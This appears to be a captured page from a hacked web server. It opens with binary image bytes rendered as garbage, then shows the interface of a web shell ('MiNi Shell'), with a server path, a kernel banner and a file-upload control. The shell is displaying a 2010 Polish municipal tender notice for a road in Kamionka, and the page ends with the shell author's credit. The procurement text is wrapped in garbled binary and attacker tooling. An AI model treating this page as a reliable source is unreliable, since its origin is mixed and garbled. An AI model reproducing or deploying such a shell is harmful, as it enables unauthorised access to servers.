JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100114/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100114/11338-N-2010.html

<p class="kh_header"><b>Kamionka: Budowa drogi gminnej nr 103269 L  od drogi pow. 1529 L - do drogi pow. 1531 L w miejscowości Ciemno gmina Kamionka</b><br>
<b>Numer ogłoszenia: 11338 - 2010; data zamieszczenia: 14.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy w Kamionce , ul. Lubartowska 1, 21-132 Kamionka, woj. lubelskie, tel. 081 8527039, faks 081 8527058.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kamionka.lubelskie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa drogi gminnej nr 103269 L  od drogi pow. 1529 L - do drogi pow. 1531 L w miejscowości Ciemno gmina Kamionka.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Budowa drogi gminnej nr 103269 L  od drogi pow. 1529 L - do drogi pow. 1531 L w miejscowości Ciemno gmina Kamionka na odcinku o długości 2378 m. Przedsięwzięcie obejmuje następujące prace w zakresie branży drogowej: roboty ziemne, podbudowa z gruntu stabilizowanego cementem, nawierzchnia bitumiczna, budowa przepustów, zjazdów oraz oznakowanie drogi.
 Przedmiot  zamówienia opisany  jest w  przedmiarze  robót, projekcie budowlanym a także Specyfikacji technicznej wykonania i odbioru robót - załącznikach do siwz będących integralną częścią niniejszej specyfikacji..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.10.00.00-8, 45.11.00.00-1, 45.11.10.00-8, 45.20.00.00-9, 45.23.00.00-8, 45.23.30.00-9, 45.23.24.53-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wymagane jest wniesienie wadium przetargowego w  kwocie 20 000,00 zł (słownie: dwadzieścia tysięcy złotych).

 Wadium należy wnieść przed upływem terminu składania ofert, tj. do dnia 04 lutego 2010 r. do godz. 10:00. 

 Wadium może  być wnoszone w jednej lub kilku następujących formach : 
a) pieniądzu; 
b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym; 
c) gwarancjach bankowych, 
d) gwarancjach ubezpieczeniowych,  
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust.5 pkt  2  ustawy    z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości ( Dz. U.  Nr 109, poz. 1158 z późn. zm. ). 

Wadium wnoszone w pieniądzu należy wpłacić na konto Zamawiającego w : PBS Lubartów Oddział w Kamionce 08 8707 1029 0300 0459 2003 0008
Dowód wpłaty należy dołączyć do oferty.

 W przypadku wnoszenia wadium w pozostałych dopuszczalnych formach określonych w punkcie 9.3 SIWZ, oryginały dokumentów należy dołączyć do oferty.
 
Zamawiający zwróci wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem pkt. 9.11 s.iw.z.
Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy
Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium na podstawie pkt. 9.6 s.i.w.z., jeżeli w wyniku ostatecznego rozstrzygnięcia protestu jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez zamawiającego. 
Jeżeli  wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającym z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszonymi o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.
Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
Zamawiający zatrzymuje wadium wraz  z odsetkami, jeżeli Wykonawca, którego oferta została wybrana: 
a) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych  ofercie. 
b) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy, 
c) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe  z przyczyn leżących po stronie Wykonawcy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.  Udział w postępowaniu mogą wziąć wykonawcy spełniający warunki określone w art. 22 ust. 1 ustawy p.z.p., którzy : 
1.1. zrealizowali w okresie  ostatnich  pięciu  lat  przed  dniem wszczęcia  postępowania,  a jeżeli  okres  prowadzenia  działalności  jest  krótszy  -  w  tym okresie  co  najmniej  2 roboty odpowiadające swoim rodzajem i wartością robotom stanowiącym przedmiot zamówienia.  Za  roboty  budowlane odpowiadające rodzajem i  wartością  robotom stanowiącym przedmiot zamówienia rozumie się 2 roboty budowlane polegające na wykonaniu dróg asfaltowych o wartości łącznej min. 3 000 000 zł; 
1.2. dysponują  odpowiednio  wykwalifikowanym personelem w celu obsadzenia stanowiska kierownika robót z uprawnieniami budowlanymi o specjalności drogowej lub odpowiadającymi im ważnymi uprawnieniami budowlanymi, które zostały wydane na podstawie wcześniej obowiązujących przepisów - 1 osoba; 
1.3. są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej. 
2. Ocena  spełniania warunków określonych w  pkt  5.1. siwz zostanie przeprowadzona  na zasadzie  spełnia / nie spełnia w oparciu o złożone przez wykonawcę oświadczenia i dokumenty wymienione w pkt 6 s.i.w.z. 

3.  Wykonawcy nie spełniający warunków określonych w ustawie prawo zamówień publicznych oraz w niniejszej specyfikacji zostaną wykluczeni z postępowania. 

4.  Wykonawcy występujący  wspólnie o udzielenie zamówienia muszą wykazać, że łącznie spełniają warunki zawarte w pkt 5.1.1 - 5.1.3 s.i.w.z. 

5. Możliwość zatrudnienia podwykonawców. 
5.1.Wykonawca nie może zlecić całości prac objętych zamówieniem podwykonawcom. 
5.2. W przypadku przewidywanego przez wykonawcę zatrudnienia podwykonawców należy w ofercie podać jaki zakres przedmiotu zamówienia  będzie  realizował wykonawca, a jaki zakres podwykonawcy.  
5.3.  Do  warunków  zatrudnienia  podwykonawcy  stosuje  się  przepis  art.  6471kc oraz zasady wymienione w punktach następnych. 
5.4.  Zlecenie części robót podwykonawcom nie zmienia zobowiązań wykonawcy wobec zamawiającego za wykonanie tej części robót. Wykonawca jest odpowiedzialny za działania,  uchybienia  i  zaniedbania  podwykonawców  i ich  pracowników  w  takim samym stopniu jakby to były działania, uchybienia i zaniedbania jego lub jego pracowników.
5.5. Warunkiem niezbędnym do uzyskania zgody zamawiającego na zawarcie umowy pomiędzy wykonawcą a podwykonawcą będzie przedstawienie zamawiającemu w terminie 14 dni przed planowanym terminem podjęcia robót przez podwykonawcę umowy pomiędzy wykonawcą a podwykonawcą lub jej projektu.
5.6. Do zawarcia umowy przez podwykonawcę z następnym podwykonawcą wymagana jest zgoda zamawiającego i wykonawcy.
5.7. Umowy, o których mowa powyżej wymagają formy pisemnej pod rygorem nieważności.
5.8. Zamawiający nie wyrazi zgody na zawarcie umowy z podwykonawcą, której                                              treść jest sprzeczna z treścią umowy zawartej z wykonawcą.
5.9. W przypadku zawarcia umowy z podwykonawca lub podwykonawcy z dalszym
podwykonawcą, zmiany umowy lub zatrudnienia nowego podwykonawcy, zmiany warunków umowy z podwykonawcą z naruszeniem zasad, o których mowa powyżej zamawiający jest zwolniony z odpowiedzialności wynikającej z art. 6471kc.
5.10. W sytuacji określonej w punkcie 5.5.9. zamawiającemu przysługują uprawnienia w postaci wstrzymania płatności należności z tytułu realizacji umowy przez wykonawcę do czasu dostosowania warunków umów do ustaleń określonych w tej części s.i.w.z.
5.11. Szczegółowe zasady wystawiania faktur i rozliczeń określa wzór umowy
stanowiący załącznik nr 3 do s.i.w.z.. Zasady te stosuje się odpowiednio do umów podwykonawców z kolejnymi podwykonawcami.
5.12. Wykonawcy nie przysługuje prawo do przedłużenia terminu wykonania przedmiotu umowy z powodu okoliczności wstrzymania płatności należności przez zamawiającego z powodów wymienionych w pkt 5.5.10. oraz umowach, o których mowa w pkt 5.5.11.
5.13. Niezastosowanie się wykonawcy do wymogów wynikających z zapisów z pkt  5.5. upoważnia zamawiającego do podjęcia wszelkich niezbędnych kroków w celu wyegzekwowania od wykonawcy ustaleń niniejszej części s.i.w.z., aż do odstąpienia od umowy z wykonawca ( z winy wykonawcy) włącznie.
5.14. Jeżeli wykonawca nie deklaruje w ofercie zatrudnienia podwykonawców, zamawiający przyjmuje, że przedmiot zamówienia zostanie wykonany samodzielnie przez wykonawcę..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Na potwierdzenie spełniania warunków, o których mowa w pkt 5. siwz do oferty należy
dołączyć :
1.1. oświadczenia zgodnego z art. 22 ust 1 ustawy p.z.p. wykonawcy o spełnianiu warunków udziału w postępowaniu - wzór formularza oświadczenia stanowi załącznik nr 2 do s.i.w.z.;
1.2. aktualny  odpis  z  właściwego  rejestru  albo  aktualne  zaświadczenia  o  wpisie do ewidencji  działalności  gospodarczej,  jeżeli  odrębne  przepisy  wymagają wpisu  do rejestru  lub  zgłoszenia  do  ewidencji  działalności  gospodarczej, wystawiony  nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; 
1.3.aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału  Zakładu  Ubezpieczeń  Społecznych  lub  Kasy Rolniczego  Ubezpieczenia Społecznego  potwierdzające  odpowiednio,  że wykonawca  nie  zalega  z  opłacaniem podatków,  opłat  oraz  składek  na ubezpieczenie  zdrowotne  i  społeczne,  lub zaświadczenia,  że  uzyskał przewidziane  prawem zwolnienie,  odroczenie  lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego  organu  - wystawionych  nie  wcześniej  niż  3  miesiące  przed  upływem terminu składania ofert 
1.4. polisa, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności, 
1.5.dokumenty stwierdzające, że osoba przewidziana na stanowisko kierownika robót, posiada wymagane uprawnienia : 
1.5.1. decyzja stwierdzająca posiadanie uprawnień budowlanych o specjalności drogowej; 
1.5.2. aktualne  zaświadczenia  o  wpisie  na  listę  właściwej  izby  samorządu zawodowego; 
1.6. wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć  w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności-- wg załącznika nr 4 do s.i.w.z.;
1.7. pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie osób, które będą uczestniczyć w wykonaniu zamówienia wykonawca wskazał osoby, którymi będzie dysponował,
1.8. wykaz wykonanych w okresie ostatnich 5 lat robót budowlanych przed dniem wszczęcia  postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w  tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania z załączeniem dokumentów  (referencji  lub innych) potwierdzających, że roboty te wykonane zostały należycie - wg załącznika nr 5 do s.i.w.z; 

2. Dokumenty, o których mowa w pkt 6.1. należy przedstawić w formie oryginału albo kserokopii poświadczonej za zgodność z oryginałem przez wykonawcę.

3. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia każdy z wykonawców z osobna musi przedstawić oświadczenie w zakresie dotyczącym art. 22 ust. 1  (pkt  6.1.1. s.i.w.z.) i dokumenty wymienione w pkt 1.2. W takim przypadku muszą oni także  ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo musi być załączone do oferty w formie oryginału lub notarialnie potwierdzonej kopii. Jeżeli oferta wykonawców, wspólnie ubiegających się o udzielenia zamówienia, zostanie  wybrana, zamawiający żąda przed zawarciem umowy w sprawie zamówienia publicznego, umowy  regulującej współpracę tych wykonawców, zgodnie z art. 23 p.z.p..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.kamionka.lubelskie.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 21-132 Kamionka
ul. Lubartowska 1
pokój nr 10.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.02.2010 godzina 10:00, miejsce: Urząd Gminy w Kamionce
21-132 Kamionka 
ul. Lubartowska 1
pokój nr 8 ( sekretariat).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> RPO Województwa Lubelskiego 2007-2013.
Działanie 5.2. -lokalny układ transportowy.

Creat By MiNi SheLL
Email: jattceo@gmail.com